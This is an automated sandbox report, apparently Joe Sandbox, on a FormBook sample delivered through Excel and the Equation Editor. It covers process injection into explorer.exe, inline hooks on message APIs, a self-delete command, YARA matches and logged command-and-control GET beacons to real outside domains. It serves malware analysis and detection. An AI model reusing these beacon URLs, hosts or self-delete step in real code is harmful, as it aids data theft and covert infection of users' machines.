Sep 27, 2021 14:04:13.249063969 CEST	14	IN	Data Raw: 1d 00 00 06 00 11 41 11 8a 6f 57 00 00 0a 00 11 8a 6f 2c 00 00 06 13 8b 11 8b 16 6f 1d 00 00 06 00 11 41 11 8b 6f 57 00 00 0a 00 00 12 88 28 5d 00 00 0a 2d a2 de 0f 12 88 fe 16 15 00 00 1b 6f 1d 00 00 0a 00 dc 00 38 f0 02 00 00 11 75 6f 6b 00 00 Data Ascii: AoWo,oAoW(]-o8uokrep(,uomrAp(+,f;o[+9(\o,oooAoW(]-o8]uokrep(,
Sep 27, 2021 14:04:13.249087095 CEST	15	IN	Data Raw: 00 00 02 00 00 00 cf 09 00 00 3d 00 00 00 0c 0a 00 00 0f 00 00 00 00 00 00 00 02 00 00 00 71 0a 00 00 64 00 00 00 d5 0a 00 00 0f 00 00 00 00 00 00 00 02 00 00 00 58 0a 00 00 9b 00 00 00 f3 0a 00 00 0f 00 00 00 00 00 00 00 02 00 00 00 54 0b 00 00 Data Ascii: =qdXT>>o$bb1b0Fv

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	128.65.195.232	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 27, 2021 14:05:31.207247972 CEST	724	OUT	GET /cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA== HTTP/1.1 Host: www.paradisgrp.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2021 14:05:31.225320101 CEST	725	IN	HTTP/1.1 404 Not Found Date: Mon, 27 Sep 2021 12:05:31 GMT Server: Apache Vary: accept-language,accept-charset Upgrade: h2 Connection: Upgrade, close Accept-Ranges: bytes Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Content-Language: en Data Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 31 0d 0a 77 65 62 6d 61 73 74 65 72 40 70 61 72 61 64 69 73 67 72 70 2e 63 6f 6d 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 39 0d 0a 77 65 62 6d 61 73 74 65 72 40 70 61 72 61 64 69 73 67 72 70 2e 63 6f 6d 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0d 0a 31 31 0d 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 31 0d 0a 34 30 34 3c 2f 68 32 3e 0a 3c 61 64 64 72 65 73 73 3e 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 35 0d 0a 77 77 77 2e 70 61 72 61 64 69 73 67 72 70 2e 63 6f 6d 3c 2f 61 3e 3c 62 72 20 2f 3e 0a 20 20 3c 73 70 61 6e 3e 0d 0a 32 39 0d 0a 41 70 61 63 68 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e Data Ascii: c8<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="13en"><head><title>38Object not found!</title><link rev="made" href="mailto:111webmaster@paradisgrp.com" /><style type="text/css">.../--><![CDATA[/>.../ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/...*/--></style></head><body><h1>1bObject not found!</h1><p>39 The requested URL was not found on this server. 57 If you entered the URL manually please check your spelling and try again. 29</p><p>48If you think this is a server error, please contactthe <a href="mailto:29webmaster@paradisgrp.com">webmaster</a>.11</p><h2>Error 21404</h2><address> <a href="/">25www.paradisgrp.com</a><br /> <span>29Apache</span></address></body>
Sep 27, 2021 14:05:31.225341082 CEST	725	IN	Data Raw: 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: </html>10

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49167	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 27, 2021 14:05:49.446181059 CEST	726	OUT	GET /cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEp HTTP/1.1 Host: www.uvoyus.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2021 14:05:49.561790943 CEST	727	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 27 Sep 2021 12:05:49 GMT Content-Type: text/html Content-Length: 275 ETag: "6139ed55-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xEB
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xEB
GetMessageW	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xEB
GetMessageA	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xEB

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1928 Parent PID: 596

General

Start time:	14:03:15
Start date:	27/09/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13faf0000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2792 Parent PID: 596

General

Start time:	14:03:35
Start date:	27/09/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2796 Parent PID: 2792

General

Start time:	14:03:41
Start date:	27/09/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x1000000
File size:	685568 bytes
MD5 hash:	50568FB6133EE4ED721EE46A3C0A9E98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.466320044.00000000024B1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 13%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2024 Parent PID: 2796

General

Start time:	14:03:45
Start date:	27/09/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x1000000
File size:	685568 bytes
MD5 hash:	50568FB6133EE4ED721EE46A3C0A9E98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 1764 Parent PID: 2024

General

Start time:	14:03:46
Start date:	27/09/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xffa10000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: autofmt.exe PID: 2820 Parent PID: 1764

General

Start time:	14:04:03
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\autofmt.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autofmt.exe
Imagebase:	0xab0000
File size:	658944 bytes
MD5 hash:	A475B7BB0CCCFD848AA26075E81D7888
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msiexec.exe PID: 2308 Parent PID: 1764

General

Start time:	14:04:03
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\msiexec.exe
Imagebase:	0xa30000
File size:	73216 bytes
MD5 hash:	4315D6ECAE85024A0567DF2CB253B7B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 1124 Parent PID: 2308

General

Start time:	14:04:06
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\Public\vbc.exe'
Imagebase:	0x4acb0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2796 Parent PID: 2792 vbc.exeCOMMON

Execution Graph

Execution Coverage:	17.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	20
Total number of Limit Nodes:	0

Executed Functions

Function 004201A0, Relevance: 6.7, Strings: 2, Instructions: 4225COMMON

Download Yara Rule

Strings

DtPk, xrefs: 00420AC7
4{Pk, xrefs: 00421081

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID: 4{Pk$DtPk
API String ID: 0-907836734
Opcode ID: ccb20fe67f1baa0c6534d6cc1b99b033aea6e17f305d4d857bae98f4747494d0
Instruction ID: 0910d783d2c19e9295847b435524ef1836222068d09f163ef68da9b31a9ad20c
Opcode Fuzzy Hash: ccb20fe67f1baa0c6534d6cc1b99b033aea6e17f305d4d857bae98f4747494d0
Instruction Fuzzy Hash: 4DA3F974A00629CFCB14DF24C894E99B3B2FF89315F1182E9D909AB365DB35AE95CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00420A19, Relevance: 6.6, Strings: 2, Instructions: 4143COMMON

Download Yara Rule

Strings

DtPk, xrefs: 00420AC7
4{Pk, xrefs: 00421081

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID: 4{Pk$DtPk
API String ID: 0-907836734
Opcode ID: b1c526840262a8db97742a7891c7f25604d2fd67b8f6d4726e03141a2bcf6f46
Instruction ID: c3e23bdfcaa1b4cdfd56c022833a8513ca415bf0b2c30ae5acf773e3b6e6705b
Opcode Fuzzy Hash: b1c526840262a8db97742a7891c7f25604d2fd67b8f6d4726e03141a2bcf6f46
Instruction Fuzzy Hash: 10A3E774A00628CFCB14DF24C894E99B3B2FF89315F1586E9D509AB361DB36AE95CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00425448, Relevance: 3.8, Strings: 2, Instructions: 1330
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

daPk, xrefs: 004264D5
4{Pk, xrefs: 00425951

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID: 4{Pk$daPk
API String ID: 0-2361635739
Opcode ID: db5a5728717dda6ec29de656b6759422a14a787c8b708372c08fa8231f9c27e4
Instruction ID: f22f9eca04b8c215cf23821c710bb5b23cc91eded8706605adfffa13748665c5
Opcode Fuzzy Hash: db5a5728717dda6ec29de656b6759422a14a787c8b708372c08fa8231f9c27e4
Instruction Fuzzy Hash: 3DE2C234A002298FCB64DB24C894FEDB3B2BF89314F1585E9D509AB365DB35AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00427018, Relevance: 3.8, Strings: 2, Instructions: 1320
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4{Pk, xrefs: 004270D9
z@, xrefs: 00427018

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID: 4{Pk$z@
API String ID: 0-3906544164
Opcode ID: 1d3fb5342b684237d53804e4f38ff2e1ac4cb4f404364265c7f4c45eb0cb1c47
Instruction ID: dbd3b2475b5d3f7bdcd404b68dc4efe00c1def4e108f04caafc26e594810eb75
Opcode Fuzzy Hash: 1d3fb5342b684237d53804e4f38ff2e1ac4cb4f404364265c7f4c45eb0cb1c47
Instruction Fuzzy Hash: E8E2B134A00229CFCB24DB24C995FD9B3B2BF8A304F1585E9D509AB365DB35AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00425891, Relevance: 3.8, Strings: 2, Instructions: 1315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

daPk, xrefs: 004264D5
4{Pk, xrefs: 00425951

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID: 4{Pk$daPk
API String ID: 0-2361635739
Opcode ID: 9e500ef6aa1f87900a6e1206f35a23c3cdd9d6f0c15ac82d95217b4a94995b36
Instruction ID: 9dcb7c436363106d518a4a9820044e142f029e13719be1e2ca64d9390b76bf44
Opcode Fuzzy Hash: 9e500ef6aa1f87900a6e1206f35a23c3cdd9d6f0c15ac82d95217b4a94995b36
Instruction Fuzzy Hash: F4E2B234A002298FCB64DB64C894FEDB3B2BF89304F1585E9D509AB365DB35AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00425508, Relevance: 2.6, Strings: 1, Instructions: 1333
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4{Pk, xrefs: 004270D9

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID: 4{Pk
API String ID: 0-1718801119
Opcode ID: 00e064edd73899bd3c4f23f57452d49493e2d3dcaefc96f17fa960116b394f64
Instruction ID: 308a5987ab18eadf5ce48b0d5e62fe50be3413c82e8e3fdf601fe50fa807eebc
Opcode Fuzzy Hash: 00e064edd73899bd3c4f23f57452d49493e2d3dcaefc96f17fa960116b394f64
Instruction Fuzzy Hash: 97E2B134A00229CFCB24DB24C995FD9B3B2BF8A304F1585E9D509AB365DB35AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004204E1, Relevance: 1.6, Strings: 1, Instructions: 301
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TNp, xrefs: 0042081E

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID: TNp
API String ID: 0-2666016086
Opcode ID: 79a92e934d286fc882a5b7904d53a48632237734757f5f5335eca922208296f1
Instruction ID: d7ed10f0f45273b64c9c1c238246c52531f5cf717389eae70224280289f0aea3
Opcode Fuzzy Hash: 79a92e934d286fc882a5b7904d53a48632237734757f5f5335eca922208296f1
Instruction Fuzzy Hash: 61D14B34E10219CFDB04DFB4C895AADB7B2FF89304F1185A9E509AB365EB70A985CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00420098, Relevance: 1.5, Strings: 1, Instructions: 296
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TNp, xrefs: 0042081E

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID: TNp
API String ID: 0-2666016086
Opcode ID: 65dfeb7f096c85e1199680a004c526ec34a99c7ab94fa360ecc560e5b1dba8e4
Instruction ID: a1a853b1e576539db95ae7fcd47dcc958a51f32f88a2ea0a7d9f2a25ef3e836e
Opcode Fuzzy Hash: 65dfeb7f096c85e1199680a004c526ec34a99c7ab94fa360ecc560e5b1dba8e4
Instruction Fuzzy Hash: 1BD13934E10219CFDB04DFB4C891AADB7B2FF89304F5185A9E509AB365EB70A985CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00428799, Relevance: .7, Instructions: 686COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a95a000b6c8897ae36da5b7c48d94c9be7c7d6ceab61b10fde89cdc0c07dffb
Instruction ID: 2699e49a06e3edcfe5e502e6d4e38fa1e9072a7a998806918019bcc3d90b2a63
Opcode Fuzzy Hash: 4a95a000b6c8897ae36da5b7c48d94c9be7c7d6ceab61b10fde89cdc0c07dffb
Instruction Fuzzy Hash: 4762D234A00229CFDB24DB74C895F99B7B2BF8A304F1185E9D5096B361DB35AE81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 004255B8, Relevance: .7, Instructions: 678COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 959961ef840eb284b231d8dcd60eb2061aa26206ebc9d80047fe0038ea070f4d
Instruction ID: 6a77ba6b249f928adab2b4bbf6eda9e01b3428738ac6b8a87b662b35e9b42cae
Opcode Fuzzy Hash: 959961ef840eb284b231d8dcd60eb2061aa26206ebc9d80047fe0038ea070f4d
Instruction Fuzzy Hash: 1062E134A10229CFDB24DB74C895F99B3B2BF8A304F1185E9E5096B361DB35AE81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0042AFD0, Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
